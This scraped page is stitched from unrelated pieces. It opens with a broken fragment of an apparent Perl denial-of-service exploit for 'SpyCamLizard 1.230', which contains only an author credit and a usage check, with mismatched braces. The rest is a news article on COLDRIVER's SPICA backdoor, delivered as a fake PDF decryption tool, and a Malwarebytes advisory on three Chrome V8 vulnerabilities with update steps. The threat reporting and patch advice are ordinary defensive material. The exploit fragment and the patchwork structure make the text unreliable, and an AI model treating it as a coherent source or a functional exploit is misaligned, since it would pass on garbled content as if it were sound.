SpyCamLizard 1.230 - Denial of Service (DoS)      [*] Coded by Fernando Mengali      [@] e-mail: fernando.mengalli@gmail.com      }  }  sub main {our ($ip, $port) = @ARGV;      unless (defined($ip) && defined($port)) {        print "       \nUsage: $0 <ip> <port>                 \n";        exit(-1);      }  }

SpyCamLizard 1.230 Denial Of Service

The Russia-linked threat actor known as COLDRIVER has been observed evolving its tradecraft to go beyond credential harvesting to deliver its first-ever custom malware written in the Rust programming language.
Google's Threat Analysis Group (TAG), which shared details of the latest activity, said the attack chains leverage PDFs as decoy documents to trigger the infection sequence. The lures are

The Russia-linked threat actor known as **COLDRIVER** has been observed evolving its tradecraft to go beyond credential harvesting to deliver its first-ever custom malware written in the Rust programming language.

Google's Threat Analysis Group (TAG), which shared details of the latest activity, said the attack chains leverage PDFs as decoy documents to trigger the infection sequence. The lures are sent from impersonation accounts.

COLDRIVER, also known by the names Blue Callisto, BlueCharlie (or TAG-53), Calisto (alternately spelled Callisto), Gossamer Bear, Star Blizzard (formerly SEABORGIUM), TA446, and UNC4057, is known to be active since 2019, targeting a wide range of sectors.

This includes academia, defense, governmental organizations, NGOs, think tanks, political outfits, and, recently, defense-industrial targets and energy facilities.

"Targets in the U.K. and U.S. appear to have been most affected by Star Blizzard activity, however activity has also been observed against targets in other NATO countries, and countries neighboring Russia," the U.S. government disclosed last month.

Spear-phishing campaigns mounted by the group are designed to engage and build trust with the prospective victims with the ultimate goal of sharing bogus sign-in pages in order to harvest their credentials and gain access to the accounts.

Microsoft, in an analysis of the COLDRIVER's tactics, called out its use of server-side scripts to prevent automated scanning of the actor-controlled infrastructure and determine targets of interest, before redirecting them to the phishing landing pages.

The latest findings from Google TAG show that the threat actor has been using benign PDF documents as a starting point as far back as November 2022 to entice the targets into opening the files.

"COLDRIVER presents these documents as a new op-ed or other type of article that the impersonation account is looking to publish, asking for feedback from the target," the tech giant said. "When the user opens the benign PDF, the text appears encrypted."

In the event the recipient responds to the message stating they cannot read the document, the threat actor responds with a link to a purported decryption tool ("Proton-decrypter.exe") hosted on a cloud storage service.

The choice of the name "Proton-decrypter.exe" is notable because Microsoft had previously revealed that the adversary predominantly uses Proton Drive to send the PDF lures through the phishing messages.

In reality, the decryptor is a backdoor named SPICA that grants COLDRIVER covert access to the machine, while simultaneously displaying a decoy document to keep up the ruse.

Prior findings from WithSecure (formerly F-Secure) have revealed the threat actor's use of a lightweight backdoor called Scout, a malware tool from the HackingTeam Remote Control System (RCS) Galileo hacking platform, as part of phishing campaigns observed in early 2016.

Scout is "intended to be used as an initial reconnaissance tool to gather basic system information and screenshots from a compromised computer, as well as enable the installation of additional malware," the Finnish cybersecurity company noted at the time.

SPICA, which is the first custom malware developed and used by COLDRIVER, uses JSON over WebSockets for command-and-control (C2), facilitating the execution of arbitrary shell commands, theft of cookies from web browsers, uploading and downloading files, and enumerating and exfiltrating files. Persistence is achieved by means of a scheduled task.

"Once executed, SPICA decodes an embedded PDF, writes it to disk, and opens it as a decoy for the user," Google TAG said. "In the background, it establishes persistence and starts the main C2 loop, waiting for commands to execute."

There is evidence to suggest that the nation-state actor's use of the implant goes back to November 2022, with the cybersecurity arm multiple variants of the "encrypted" PDF lure, indicating that there could be different versions of SPICA to to match the lure document sent to targets.

As part of its efforts to disrupt the campaign and prevent further exploitation, Google TAG said it added all known websites, domains, and files associated with the hacking crew to Safe Browsing blocklists.

The development comes over a month after the U.K. and the U.S. governments sanctioned two Russian members of COLDRIVER, Ruslan Aleksandrovich Peretyatko and Andrey Stanislavovich Korinets, for their involvement in conducting the spear-phishing operations.

French cybersecurity firm Sekoia has since publicized links between Korinets and known infrastructure used by the group, which comprises dozens of phishing domains and multiple servers.

  
"Calisto contributes to Russian intelligence efforts to support Moscow's strategic interests," the company said. "It seems that domain registration was one of \[Korinets'\] main skills, plausibly used by Russian intelligence, either directly or through a contractor relationship."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Russian COLDRIVER Hackers Expand Beyond Phishing with Custom Malware

Google has issued a security update for the Chrome browser that includes a patch for one zero-day vulnerability.

Google has released an update for Chrome which includes four security fixes, including one for a vulnerability that has reportedly already been exploited.

The easiest way to update Chrome is to allow it to update automatically, which basically uses the same method as outlined below but does not require your attention. But you can end up lagging behind if you never close the browser or if something goes wrong—such as an extension stopping you from updating the browser.

So, it doesn’t hurt to check now and then. And now would be a good time, given the severity of the vulnerability in this patch. My preferred method is to have Chrome open the page _chrome://settings/help_ which you can also find by clicking **Settings > About Chrome**.

If there is an update available, Chrome will notify you and start downloading it. Then all you have to do is relaunch the browser in order for the update to complete, and for you to be safe from those vulnerabilities.

After the update, the version should be 120.0.6099.224, or later

**Technical details**

Google never gives out a lot of information about vulnerabilities, for obvious reasons. Access to bug details and links may be kept restricted until a majority of users are updated with a fix. However, from the update page we can learn a few things.

Three vulnerabilities found by external researchers all lie in Chrome’s V8 JavaScript engine.

The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. The three V8 vulnerabilities are listed as:

CVE-2024-0517: an out of bounds write in V8 in Google Chrome prior to 120.0.6099.224 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.

An out-of-bounds write can occur when a program writes outside the bounds of an allocated area of memory, potentially leading to a crash or arbitrary code execution. This can happen when the size of the data written is larger than the size of the allocated memory area, when the data is written to an incorrect location within the memory area, or when the program incorrectly calculates the size or location of the data to be written.

CVE-2024-0518: a type confusion in V8 in Google Chrome prior to 120.0.6099.224 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.

Type confusion vulnerabilities are programming flaws that happen when a piece of code doesn’t verify the type of object that is passed to it before using it. Type confusion can allow an attacker to feed function pointers or data into the wrong piece of code. In this case, it can lead to heap corruption.

Heap corruption occurs when a program modifies the contents of a memory location outside of the memory allocated to the program. The heap is an area of memory made available for use by the program. The program can request blocks of memory for its use within the heap.

CVE-2024-0519: out of bounds memory access in V8 in Google Chrome prior to 120.0.6099.224 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.

An out-of-bounds memory access means that the software has access to data past the end, or before the beginning, of the intended buffer.

Google notes that it is aware of reports that an exploit for CVE-2024-0519 exists in the wild.

V8 is an open-source JavaScript and WebAssembly engine developed by the Chromium Project for Chromium and Google Chrome web browsers, so users of other Chromium based browsers, like Microsoft Edge, can expect to see similar updates in the near future.

Microsoft says it’s actively working on releasing a security patch and added:

> “It’s worth highlighting that Microsoft Edge’s enhanced security mode feature mitigates this vulnerability. You can opt-in into this security feature and have peace of mind that Microsoft Edge is protecting you against this exploit.”

Use the following steps to configure enhanced security in Edge.

1.  In Microsoft Edge, go to **Settings and more** > **Settings** > **Privacy, search, and services**.
2.  Under **Security**, verify that **Enhance your security on the web** is enabled.
3.  Select the option that’s best for your browsing.

The following toggle settings are available:

*   Toggle Off (Default): Feature is turned off
*   Toggle On – Balanced (Recommended): Microsoft Edge will apply added security protections when users visit unfamiliar sites but bypass those protections for commonly visited sites. This combination provides a practical level of protection against attackers while preserving the user experience for a user’s usual tasks on the web.
*   Toggle On – Strict: Microsoft Edge will apply added security protections for all the sites a user visits. Users may report some challenges accomplishing their usual tasks.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Tag

#google